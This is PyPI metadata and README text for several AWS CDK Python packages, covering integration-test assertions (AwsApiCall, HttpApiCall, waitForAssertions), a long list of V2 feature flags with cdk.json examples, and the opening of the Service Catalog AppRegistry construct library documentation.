be done by using the class directory (in the case of a normal deployment): ```python # stack: Stack HttpApiCall(stack, "MyAsssertion", url="https://example-api.com/abc" ) ``` Or by using the `httpApiCall` method on `DeployAssert` (when writing integration tests): ```python # app: App # stack: Stack integ = IntegTest(app, "Integ", test_cases=[stack] ) integ.assertions.http_api_call("https://example-api.com/abc") ``` #### AwsApiCall Using the `AwsApiCall` construct will use the AWS JavaScript SDK to make the API call. This can be done by using the class directory (in the case of a normal deployment): ```python # stack: Stack AwsApiCall(stack, "MyAssertion", service="SQS", api="receiveMessage", parameters={ "QueueUrl": "url" } ) ``` Or by using the `awsApiCall` method on `DeployAssert` (when writing integration tests): ```python # app: App # stack: Stack integ = IntegTest(app, "Integ", test_cases=[stack] ) integ.assertions.aws_api_call("SQS", "receiveMessage", { "QueueUrl": "url" }) ``` You must specify the `service` and the `api` when using The `AwsApiCall` construct. The `service` is the name of an AWS service, in one of the following forms: * An AWS SDK for JavaScript v3 package name (`@aws-sdk/client-api-gateway`) * An AWS SDK for JavaScript v3 client name (`api-gateway`) * An AWS SDK for JavaScript v2 constructor name (`APIGateway`) * A lowercase AWS SDK for JavaScript v2 constructor name (`apigateway`) The `api` is the name of an AWS API call, in one of the following forms: * An API call name as found in the API Reference documentation (`GetObject`) * The API call name starting with a lowercase letter (`getObject`) * The AWS SDK for JavaScript v3 command class name (`GetObjectCommand`) By default, the `AwsApiCall` construct will automatically add the correct IAM policies to allow the Lambda function to make the API call. It does this based on the `service` and `api` that is provided. In the above example the service is `SQS` and the api is `receiveMessage` so it will create a policy with `Action: 'sqs:ReceiveMessage`. There are some cases where the permissions do not exactly match the service/api call, for example the S3 `listObjectsV2` api. In these cases it is possible to add the correct policy by accessing the `provider` object. ```python # app: App # stack: Stack # integ: IntegTest api_call = integ.assertions.aws_api_call("S3", "listObjectsV2", { "Bucket": "mybucket" }) api_call.provider.add_to_role_policy({ "Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": ["*"] }) ``` When executing `waitForAssertion()`, it is necessary to add an IAM policy using `waiterProvider.addToRolePolicy()`. Because `IApiCall` does not have a `waiterProvider` property, you need to cast it to `AwsApiCall`. ```python # integ: IntegTest api_call = integ.assertions.aws_api_call("S3", "listObjectsV2", { "Bucket": "mybucket" }).wait_for_assertions() api_call.waiter_provider.add_to_role_policy({ "Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": ["*"] }) ``` Note that addToRolePolicy() uses direct IAM JSON policy blobs, not a iam.PolicyStatement object like you will see in the rest of the CDK. ### EqualsAssertion This library currently provides the ability to assert that two values are equal to one another by utilizing the `EqualsAssertion` class. This utilizes a Lambda backed `CustomResource` which in tern uses the [Match](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.assertions.Match.html) utility from the [@aws-cdk/assertions](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.assertions-readme.html) library. ```python # app: App # stack: Stack # queue: sqs.Queue # fn: lambda.IFunction integ = IntegTest(app, "Integ", test_cases=[stack] ) integ.assertions.invoke_function( function_name=fn.function_name, invocation_type=InvocationType.EVENT, payload=JSON.stringify({"status": "OK"}) ) message = integ.assertions.aws_api_call("SQS", "receiveMessage", { "QueueUrl": queue.queue_url, "WaitTimeSeconds": 20 }) message.assert_at_path("Messages.0.Body", ExpectedResult.object_like({ "request_context": { "condition": "Success" }, "request_payload": { "status": "OK" }, "response_context": { "status_code": 200 }, "response_payload": "success" })) ``` #### Match `integ-tests` also provides a `Match` utility similar to the `@aws-cdk/assertions` module. `Match` can be used to construct the `ExpectedResult`. While the utility is similar, only a subset of methods are currently available on the `Match` utility of this module: `arrayWith`, `objectLike`, `stringLikeRegexp` and `serializedJson`. ```python # message: AwsApiCall message.expect(ExpectedResult.object_like({ "Messages": Match.array_with([{ "Payload": Match.serialized_json({"key": "value"}) }, { "Body": { "Values": Match.array_with([{"Asdf": 3}]), "Message": Match.string_like_regexp("message") } } ]) })) ``` ### Examples #### Invoke a Lambda Function In this example there is a Lambda Function that is invoked and we assert that the payload that is returned is equal to '200'. ```python # lambda_function: lambda.IFunction # app: App stack = Stack(app, "cdk-integ-lambda-bundling") integ = IntegTest(app, "IntegTest", test_cases=[stack] ) invoke = integ.assertions.invoke_function( function_name=lambda_function.function_name ) invoke.expect(ExpectedResult.object_like({ "Payload": "200" })) ``` The above example will by default create a CloudWatch log group that's never expired. If you want to configure it with custom log retention days, you need to specify the `logRetention` property. ```python import aws_cdk.aws_logs as logs # lambda_function: lambda.IFunction # app: App stack = Stack(app, "cdk-integ-lambda-bundling") integ = IntegTest(app, "IntegTest", test_cases=[stack] ) invoke = integ.assertions.invoke_function( function_name=lambda_function.function_name, log_retention=logs.RetentionDays.ONE_WEEK ) ``` #### Make an AWS API Call In this example there is a StepFunctions state machine that is executed and then we assert that the result of the execution is successful. ```python # app: App # stack: Stack # sm: IStateMachine test_case = IntegTest(app, "IntegTest", test_cases=[stack] ) # Start an execution start = test_case.assertions.aws_api_call("StepFunctions", "startExecution", { "state_machine_arn": sm.state_machine_arn }) # describe the results of the execution describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "execution_arn": start.get_att_string("executionArn") }) # assert the results describe.expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })) ``` #### Chain ApiCalls Sometimes it may be necessary to chain API Calls. Since each API call is its own resource, all you need to do is add a dependency between the calls. There is an helper method `next` that can be used. ```python # integ: IntegTest integ.assertions.aws_api_call("S3", "putObject", { "Bucket": "amzn-s3-demo-bucket", "Key": "my-key", "Body": "helloWorld" }).next(integ.assertions.aws_api_call("S3", "getObject", { "Bucket": "amzn-s3-demo-bucket", "Key": "my-key" })) ``` #### Wait for results A common use case when performing assertions is to wait for a condition to pass. Sometimes the thing that you are asserting against is not done provisioning by the time the assertion runs. In these cases it is possible to run the assertion asynchronously by calling the `waitForAssertions()` method. Taking the example above of executing a StepFunctions state machine, depending on the complexity of the state machine, it might take a while for it to complete. ```python # app: App # stack: Stack # sm: IStateMachine test_case = IntegTest(app, "IntegTest", test_cases=[stack] ) # Start an execution start = test_case.assertions.aws_api_call("StepFunctions", "startExecution", { "state_machine_arn": sm.state_machine_arn }) # describe the results of the execution describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "execution_arn": start.get_att_string("executionArn") }).expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })).wait_for_assertions() ``` When you call `waitForAssertions()` the assertion provider will continuously make the `awsApiCall` until the `ExpectedResult` is met. You can also control the parameters for waiting, for example: ```python # test_case: IntegTest # start: IApiCall describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "execution_arn": start.get_att_string("executionArn") }).expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })).wait_for_assertions( total_timeout=Duration.minutes(5), interval=Duration.seconds(15), backoff_rate=3 ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:22.587217
aws_cdk_integ_tests_alpha-2.239.0a0.tar.gz
761,611
f5/b5/1c9d091623d3007cb31263f683073cb116fabaa4bb1ef45c91e6f4365db4/aws_cdk_integ_tests_alpha-2.239.0a0.tar.gz
source
sdist
null
false
06884f5d1d7a3b66b4f2810ec71ffff1
80eead91c8bda50602b038b9b7b7985358bce68cb3d3da87e434c57e95318158
f5b51c9d091623d3007cb31263f683073cb116fabaa4bb1ef45c91e6f4365db4
null
[]
0
2.1
aws-cdk.cx-api
2.239.0
Cloud executable protocol
# Cloud Executable API This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. ## V2 Feature Flags * `@aws-cdk/aws-s3:createDefaultLoggingPolicy` Enable this feature flag to create an S3 bucket policy by default in cases where an AWS service would automatically create the Policy if one does not exist. For example, in order to send VPC flow logs to an S3 bucket, there is a specific Bucket Policy that needs to be attached to the bucket. If you create the bucket without a policy and then add the bucket as the flow log destination, the service will automatically create the bucket policy with the necessary permissions. If you were to then try and add your own bucket policy CloudFormation will throw and error indicating that a bucket policy already exists. In cases where we know what the required policy is we can go ahead and create the policy so we can remain in control of it. [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/AWS-logs-and-resource-policy.html#AWS-logs-infrastructure-S3](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/AWS-logs-and-resource-policy.html#AWS-logs-infrastructure-S3) *cdk.json* ```json { "context": { "@aws-cdk/aws-s3:createDefaultLoggingPolicy": true } } ``` * `@aws-cdk/aws-sns-subscriptions:restrictSqsDescryption` Enable this feature flag to restrict the decryption of a SQS queue, which is subscribed to a SNS topic, to only the topic which it is subscribed to and not the whole SNS service of an account. Previously the decryption was only restricted to the SNS service principal. To make the SQS subscription more secure, it is a good practice to restrict the decryption further and only allow the connected SNS topic to decryption the subscribed queue. *cdk.json* ```json { "context": { "@aws-cdk/aws-sns-subscriptions:restrictSqsDescryption": true } } ``` * @aws-cdk/aws-apigateway:disableCloudWatchRole Enable this feature flag to change the default behavior for aws-apigateway.RestApi and aws-apigateway.SpecRestApi to *not* create a CloudWatch role and Account. There is only a single ApiGateway account per AWS environment which means that each time you create a RestApi in your account the ApiGateway account is overwritten. If at some point the newest RestApi is deleted, the ApiGateway Account and CloudWatch role will also be deleted, breaking any existing ApiGateways that were depending on them. When this flag is enabled you should either create the ApiGateway account and CloudWatch role separately *or* only enable the cloudWatchRole on a single RestApi. *cdk.json* ```json { "context": { "@aws-cdk/aws-apigateway:disableCloudWatchRole": true } } ``` * `@aws-cdk/core:enablePartitionLiterals` Enable this feature flag to have `Stack.partition` return a literal string for a stack's partition when the stack has a known region configured. If the region is undefined, or set to an unknown value, the `Stack.partition` will be the CloudFormation intrinsic value `AWS::Partition`. Without this feature flag, `Stack.partition` always returns the CloudFormation intrinsic value `AWS::Partition`. This feature will often simplify ARN strings in CDK generated templates, for example: ```yaml Principal: AWS: Fn::Join: - "" - - "arn:" - Ref: AWS::Partition - :iam::123456789876:root ``` becomes: ```yaml Principal: AWS: "arn:aws:iam::123456789876:root" ``` * `@aws-cdk/aws-ecs:disableExplicitDeploymentControllerForCircuitBreaker` Enable this feature flag to avoid setting the "ECS" deployment controller when adding a circuit breaker to an ECS Service, as this will trigger a full replacement which fails to deploy when using set service names. This does not change any behaviour as the default deployment controller when it is not defined is ECS. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs:disableExplicitDeploymentControllerForCircuitBreaker": true } } ``` * `@aws-cdk/aws-s3:serverAccessLogsUseBucketPolicy` Enable this feature flag to use S3 Bucket Policy for granting permission fo Server Access Logging rather than using the canned `LogDeliveryWrite` ACL. ACLs do not work when Object Ownership is enabled on the bucket. This flag uses a Bucket Policy statement to allow Server Access Log delivery, following best practices for S3. [https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html) ```json { "context": { "@aws-cdk/aws-s3:serverAccessLogsUseBucketPolicy": true } } ``` * `@aws-cdk/aws-rds:databaseProxyUniqueResourceName` Enable this feature flag to use unique resource names for each `DatabaseProxy`. Previously, the default behavior for `DatabaseProxy` was to use `id` of the constructor for `dbProxyName`. In this case, users couldn't deploy `DatabaseProxy`s that have the same `id` in the same region. This is a feature flag as the old behavior was technically incorrect, but users may have come to depend on it. ```json { "context": { "@aws-cdk/aws-rds:databaseProxyUniqueResourceName": true } } ``` * `@aws-cdk/aws-redshift:columnId` Enable this feature flag to allow the CDK to track changes in Redshift columns through their `id` attribute. This is a breaking change, as the `name` attribute was currently being used to track changes to Redshift columns. Enabling this feature flag comes at a risk for existing Redshift columns, as the `name` attribute of a redshift column was currently being used. Therefore, to change a Redshift columns' `name` will essentially create a new column and delete the old one. This will cause data loss. If you choose to enable this flag, ensure that upon intial deployment (the first deployment after setting this feature flag), the `name` attribute of every column is not changed. After the intial deployment, you can freely change the `name` attribute of a column. *cdk.json* ```json { "context": { "@aws-cdk/aws-redshift:columnId": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:enableEmrServicePolicyV2` Enable this feature flag to use the `AmazonEMRServicePolicy_v2` managed policies for the EMR service role. This is a feature flag as the old behavior will be deprecated, but some resources may require manual intervention since they might not have the appropriate tags propagated automatically. [https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-iam-policies.html](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-iam-policies.html) *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:enableEmrServicePolicyV2": true } } ``` * `@aws-cdk/core:includePrefixInUniqueNameGeneration` Enable this feature flag to include the stack's prefixes to the name generation process. Not doing so can cause the name of stack to exceed 128 characters: * The name generation ensures it doesn't exceed 128 characters * Without this feature flag, the prefix is prepended to the generated name, which result can exceed 128 characters This is a feature flag as it changes the name generated for stacks. Any CDK application deployed prior this fix will most likely be generated with a new name, causing the stack to be recreated with the new name, and then deleting the old one. For applications running on production environments this can be unmanageable. *cdk.json* ```json { "context": { "@aws-cdk/core:includePrefixInUniqueNameGeneration": true } } ``` * `@aws-cdk/aws-lambda-nodejs:useLatestRuntimeVersion` Enable this feature flag to automatically use the latest available NodeJS version in the aws-lambda-nodejse.Function construct. This allows creation of new functions using a version that will automatically stay up to date without breaking bundling of existing functions that externalize packages included in their environemnt such as `aws-sdk`. Functions defined previously will continue to function correctly as long as they pass an explicit runtime version, or do not exclude packages during bundling. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda-nodejs:useLatestRuntimeVersion": true } } ``` * `@aws-cdk/aws-codepipeline-actions:useNewDefaultBranchForCodeCommitSource` Enable this feature flag to update the default branch for CodeCommit source actions to `main`. Previously, the default branch for CodeCommit source actions was set to `master`. However, this convention is no longer supported, and repositories created after March 2021 now have `main` as their default branch. *cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline-actions:useNewDefaultBranchForCodeCommitSource": true } } ``` * `@aws-cdk/aws-cloudwatch-actions:changeLambdaPermissionLogicalIdForLambdaAction` Enable this feature flag to change the logical ID of the `LambdaPermission` for the `LambdaAction` to include an alarm ID. Previously, only one alarm with the `LambdaAction` could be created per Lambda. This flag allows multiple alarms with the `LambdaAction` for the same Lambda to be created. *cdk.json* ```json { "context": { "@aws-cdk/aws-cloudwatch-actions:changeLambdaPermissionLogicalIdForLambdaAction": true } } ``` * `@aws-cdk/aws-codepipeline:crossAccountKeysDefaultValueToFalse` Enables Pipeline to set the default value for `crossAccountKeys` to false. When this feature flag is enabled, and the `crossAccountKeys` property is not provided in a `Pipeline` construct, the construct automatically defaults the value of this property to false. *cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline:crossAccountKeysDefaultValueToFalse": true } } ``` * `@aws-cdk/aws-codepipeline:defaultPipelineTypeToV2` Enables Pipeline to set the default pipeline type to V2. When this feature flag is enabled, and the `pipelineType` property is not provided in a `Pipeline` construct, the construct automatically defaults the value of this property to `PipelineType.V2`. *cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline:defaultPipelineTypeToV2": true } } ``` * `@aws-cdk/aws-kms:reduceCrossAccountRegionPolicyScope` Reduce resource scope of the IAM Policy created from KMS key grant to granting key only. When this feature flag is enabled and calling KMS key grant method, the created IAM policy will reduce the resource scope from '*' to this specific granting KMS key. *cdk.json* ```json { "context": { "@aws-cdk/aws-kms:reduceCrossAccountRegionPolicyScope": true } } ``` * `@aws-cdk/aws-kms:applyImportedAliasPermissionsToPrincipal` Enable grant methods on imported KMS Aliases to apply permissions scoped by the alias using the `kms:ResourceAliases` condition key. When this flag is disabled, grant* methods on `Alias.fromAliasName` remain no-ops to preserve existing behavior. *cdk.json* ```json { "context": { "@aws-cdk/aws-kms:applyImportedAliasPermissionsToPrincipal": true } } ``` * `@aws-cdk/aws-eks:nodegroupNameAttribute` When enabled, nodegroupName attribute of the provisioned EKS NodeGroup will not have the cluster name prefix. When this feature flag is enabled, the nodegroupName attribute will be exactly the name of the nodegroup without any prefix. *cdk.json* ```json { "context": { "@aws-cdk/aws-eks:nodegroupNameAttribute": true } } ``` * `@aws-cdk/aws-ec2:ebsDefaultGp3Volume` When enabled, the default volume type of the EBS volume will be GP3. When this featuer flag is enabled, the default volume type of the EBS volume will be `EbsDeviceVolumeType.GENERAL_PURPOSE_SSD_GP3` *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:ebsDefaultGp3Volume": true } } ``` * `@aws-cdk/aws-ecs:removeDefaultDeploymentAlarm` When enabled, remove default deployment alarm settings. When this featuer flag is enabled, remove the default deployment alarm settings when creating a AWS ECS service. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:ebsDefaultGp3Volume": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:ecsReduceRunTaskPermissions` When enabled, IAM Policy created to run tasks won't include the task definition ARN, only the revision ARN. When this feature flag is enabled, the IAM Policy created to run tasks won't include the task definition ARN, only the revision ARN. The revision ARN is more specific than the task definition ARN. See [https://docs.aws.amazon.com/step-functions/latest/dg/ecs-iam.html](https://docs.aws.amazon.com/step-functions/latest/dg/ecs-iam.html) for more details. *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:ecsReduceRunTaskPermissions": true } } ``` * `@aws-cdk/aws-stepfunctions-taks:useNewS3UriParametersForBedrockInvokeModelTask` When enabled, use new props for S3 URI under `input` and `output` fields in task definition of state machine for bedrock invoke model. When this feature flag is enabled, use newly introduced props `s3InputUri` and `s3OutputUri` to populate S3 uri under input and output fields in state machine task definition for Bedrock invoke model. *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:useNewS3UriParametersForBedrockInvokeModelTask": true } } ``` * `@aws-cdk/aws-ecs:reduceEc2FargateCloudWatchPermissions` Currently, we will automatically add a number of cloudwatch permissions to the task role when no cloudwatch log group is specified as logConfiguration and it will grant 'Resources': ['*'] to the task role. When this feature flag is enabled, we will only grant the necessary permissions when users specify cloudwatch log group. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs:reduceEc2FargateCloudWatchPermissions": true } } ``` * `@aws-cdk/aws-ec2:ec2SumTImeoutEnabled` Currently is both initOptions.timeout and resourceSignalTimeout are both specified in the options for creating an EC2 Instance, only the value from 'resourceSignalTimeout' will be used. When this feature flag is enabled, if both initOptions.timeout and resourceSignalTimeout are specified, the values will to be summed together. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:ec2SumTImeoutEnabled": true } } ``` * `@aws-cdk/aws-appsync:appSyncGraphQLAPIScopeLambdaPermission` Currently, when using a Lambda authorizer with an AppSync GraphQL API, the AWS CDK automatically generates the necessary AWS::Lambda::Permission to allow the AppSync API to invoke the Lambda authorizer. This permission is overly permissive because it lacks a SourceArn, meaning it allows invocations from any source. When this feature flag is enabled, the AWS::Lambda::Permission will be properly scoped with the SourceArn corresponding to the specific AppSync GraphQL API. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:appSyncGraphQLAPIScopeLambdaPermission": true } } ``` * `@aws-cdk/aws-rds:setCorrectValueForDatabaseInstanceReadReplicaInstanceResourceId` When enabled, the value of property `instanceResourceId` in construct `DatabaseInstanceReadReplica` will be set to the correct value which is `DbiResourceId` instead of currently `DbInstanceArn`* (fix) When this feature flag is enabled, the value of that property will be as expected set to `DbiResourceId` attribute, and that will fix the grantConnect method. *cdk.json* ```json { "context": { "@aws-cdk/aws-rds:setCorrectValueForDatabaseInstanceReadReplicaInstanceResourceId": true } } ``` * `@aws-cdk/aws-lambda-nodejs:sdkV3ExcludeSmithyPackages` Currently, when bundling Lambda functions with the non-latest runtime that supports AWS SDK JavaScript (v3), only the `@aws-sdk/*` packages are excluded by default. However, this can cause version mismatches between the `@aws-sdk/*` and `@smithy/*` packages, as they are tightly coupled dependencies in AWS SDK v3. When this feature flag is enabled, both `@aws-sdk/*` and `@smithy/*` packages will be excluded during the bundling process. This ensures that no mismatches occur between these tightly coupled dependencies when using the AWS SDK v3 in Lambda functions. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda-nodejs:sdkV3ExcludeSmithyPackages": true } } ``` * `@aws-cdk/aws-dynamodb:resourcePolicyPerReplica` If this flag is not set, the default behavior for `TableV2` is to use a different `resourcePolicy` for each replica. If this flag is set to false, the behavior is that each replica shares the same `resourcePolicy` as the source table. This will prevent you from creating a new table which has an additional replica and a resource policy. This is a feature flag as the old behavior was technically incorrect but users may have come to depend on it. *cdk.json* ```json { "context": { "@aws-cdk/aws-dynamodb:resourcePolicyPerReplica": false, }, } ``` * `@aws-cdk/aws-route53-targets:userPoolDomainNameMethodWithoutCustomResource` When enabled, use a new method for DNS Name of user pool domain target without creating a custom resource. When this feature flag is enabled, a new method will be used to get the DNS Name of the user pool domain target. The old method creates a custom resource internally, but the new method doesn't need a custom resource. If the flag is set to false then a custom resource will be created when using `UserPoolDomainTarget`. *cdk.json* ```json { "context": { "@aws-cdk/aws-route53-targets:userPoolDomainNameMethodWithoutCustomResource": true } } ``` * `@aws-cdk/aws-elasticloadbalancingV2:albDualstackWithoutPublicIpv4SecurityGroupRulesDefault` When enabled, the default security group ingress rules will allow IPv6 ingress from anywhere, For internet facing ALBs with `dualstack-without-public-ipv4` IP address type, the default security group rules will allow IPv6 ingress from anywhere (::/0). Previously, the default security group rules would only allow IPv4 ingress. Using a feature flag to make sure existing customers who might be relying on the overly restrictive permissions are not broken., If the flag is set to false then the default security group rules will only allow IPv4 ingress. *cdk.json* ```json { "context": { "@aws-cdk/aws-elasticloadbalancingV2:albDualstackWithoutPublicIpv4SecurityGroupRulesDefault": true } } ``` * `@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections` When this feature flag is enabled, the default behaviour of OIDC Provider's custom resource handler will default to reject unauthorized connections when downloading CA Certificates. When this feature flag is disabled, the behaviour will be the same as current and will allow downloading thumbprints from unsecure connnections. *cdk.json* ```json { "context": { "@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections": true } } ``` * `@aws-cdk/core:enableAdditionalMetadataCollection` When this feature flag is enabled, CDK expands the scope of usage data collection to include the: * L2 construct property keys - Collect which property keys you use from the L2 constructs in your app. This includes property keys nested in dictionary objects. * L2 construct property values of BOOL and ENUM types - Collect property key values of only BOOL and ENUM types. All other types, such as string values or construct references will be redacted. * L2 construct method usage - Collection method name, parameter keys and parameter values of BOOL and ENUM type. *cdk.json* ```json { "context": { "@aws-cdk/core:enableAdditionalMetadataCollection": true } } ``` * `@aws-cdk/aws-lambda:createNewPoliciesWithAddToRolePolicy` [Deprecated default feature] When this feature flag is enabled, Lambda will create new inline policies with AddToRolePolicy. The purpose of this is to prevent lambda from creating a dependency on the Default Policy Statement. This solves an issue where a circular dependency could occur if adding lambda to something like a Cognito Trigger, then adding the User Pool to the lambda execution role permissions. However in the current implementation, we have removed a dependency of the lambda function on the policy. In addition to this, a Role will be attached to the Policy instead of an inline policy being attached to the role. This will create a data race condition in the CloudFormation template because the creation of the Lambda function no longer waits for the policy to be created. Having said that, we are not deprecating the feature (we are defaulting the feature flag to false for new stacks) since this feature can still be used to get around the circular dependency issue (issue-7016) particularly in cases where the lambda resource creation doesnt need to depend on the policy resource creation. We recommend to unset the feature flag if already set which will restore the original behavior. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda:createNewPoliciesWithAddToRolePolicy": false } } ``` * `@aws-cdk/aws-s3:setUniqueReplicationRoleName` When this feature flag is enabled, a unique role name is specified only when performing cross-account replication. When disabled, 'CDKReplicationRole' is always specified. *cdk.json* ```json { "context": { "@aws-cdk/aws-s3:setUniqueReplicationRoleName": true } } ``` * `@aws-cdk/pipelines:reduceStageRoleTrustScope` When this feature flag is enabled, the root account principal will not be added to the trust policy of stage role. When this feature flag is disabled, it will keep the root account principal in the trust policy. *cdk.json* ```json { "context": { "@aws-cdk/pipelines:reduceStageRoleTrustScope": true } } ``` * `@aws-cdk/aws-events:requireEventBusPolicySid` When this flag is enabled: * Resource policies will be created with Statement IDs for service principals * The operation will succeed as expected When this flag is disabled: * A warning will be emitted * The grant operation will be dropped * No permissions will be added *cdk.json* ```json { "context": { "@aws-cdk/aws-events:requireEventBusPolicySid": true } } ``` * `@aws-cdk/aws-dynamodb:retainTableReplica` Currently, table replica will always be deleted when stack deletes regardless of source table's deletion policy. When enabled, table replica will be default to the removal policy of source table unless specified otherwise. *cdk.json* ```json { "context": { "@aws-cdk/aws-dynamodb:retainTableReplica": true } } ``` * `@aws-cdk/cognito:logUserPoolClientSecretValue` When this feature flag is enabled, the SDK API call response to desribe user pool client values will be logged in the custom resource lambda function logs. When this feature flag is disabled, the SDK API call response to describe user pool client values will not be logged in the custom resource lambda function logs. *cdk.json* ```json { "context": { "@aws-cdk/cognito:logUserPoolClientSecretValue": true } } ``` * `@aws-cdk/aws-s3:publicAccessBlockedByDefault` When BlockPublicAccess is not set at all, s3's default behavior will be to set all options to true in aws console. The previous behavior in cdk before this feature was; if only some of the BlockPublicAccessOptions were set (not all 4), then the ones undefined would default to false. This is counter intuitive to the console behavior where the options would start in true state and a user would uncheck the boxes as needed. The new behavior from this feature will allow a user, for example, to set 1 of the 4 BlockPublicAccessOpsions to false, and on deployment the other 3 will remain true. *cdk.json* ```json { "context": { "@aws-cdk/aws-s3:publicAccessBlockedByDefault": true } } ``` * `@aws-cdk/aws-ec2:requirePrivateSubnetsForEgressOnlyInternetGateway` When this feature flag is enabled, EgressOnlyGateway is created only for dual-stack VPC with private subnets When this feature flag is disabled, EgressOnlyGateway resource is created for all dual-stack VPC regardless of subnet type *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:requirePrivateSubnetsForEgressOnlyInternetGateway": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:httpInvokeDynamicJsonPathEndpoint` When this feature flag is enabled, the JSONPath apiEndpoint value will be resolved dynamically at runtime, while slightly increasing the size of the state machine definition. When disabled, the JSONPath apiEndpoint property will only support a static string value. _cdk.json ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:httpInvokeDynamicJsonPathEndpoint": true } } ``` * `@aws-cdk/aws-signer:signingProfileNamePassedToCfn` When this feature flag is enabled, the `signingProfileName` property is passed to the L1 `CfnSigningProfile` construct, which ensures that the AWS Signer profile is created with the specified name. When this feature flag is disabled, the `signingProfileName` is not passed to CloudFormation, maintaining backward compatibility with existing deployments where CloudFormation auto-generated profile names. This feature flag is needed because enabling it can cause existing signing profiles to be replaced during deployment if a `signingProfileName` was specified but not previously used in the CloudFormation template. *cdk.json* ```json { "context": { "@aws-cdk/aws-signer:signingProfileNamePassedToCfn": true } } ``` * `@aws-cdk/aws-ecs-patterns:uniqueTargetGroupId` When enabled, ECS patterns will generate unique target group IDs that include the load balancer name and type (public/private). This prevents CloudFormation conflicts when switching between public and private load balancers. Without this flag, switching an ApplicationLoadBalancedFargateService from public to private (or vice versa) fails with "target group cannot be associated with more than one load balancer" error. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs-patterns:uniqueTargetGroupId": true } } ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk.cloud-assembly-schema>=50.3.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:21.740279
aws_cdk_cx_api-2.239.0.tar.gz
374,222
08/aa/603c8d470377b90af250b7dc39032f1dc1793a715dfdc4d4ae4eb250074e/aws_cdk_cx_api-2.239.0.tar.gz
source
sdist
null
false
df273a44f4b6219e70304a7dbd4d157d
17b92957de1d42e3851af1710ebb16a1be1b34237cf2fc9415c424d594b90bfa
08aa603c8d470377b90af250b7dc39032f1dc1793a715dfdc4d4ae4eb250074e
null
[]
0
2.1
aws-cdk.aws-servicecatalogappregistry-alpha
2.239.0a0
The CDK Construct Library for AWS::ServiceCatalogAppRegistry
# AWS ServiceCatalogAppRegistry Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> [AWS Service Catalog App Registry](https://docs.aws.amazon.com/servicecatalog/latest/adminguide/appregistry.html) enables organizations to create and manage repositories of applications and associated resources. ## Table Of Contents * [Application](#application) * [Application-Associator](#application-associator) * [Attribute-Group](#attribute-group) * [Associations](#associations) * [Associating application with an attribute group](#attribute-group-association) * [Associating application with a stack](#resource-association) * [Sharing](#sharing) * [Sharing an application](#sharing-an-application) * [Sharing an attribute group](#sharing-an-attribute-group) The `@aws-cdk/aws-servicecatalogappregistry-alpha` package contains resources that enable users to automate governance and management of their AWS 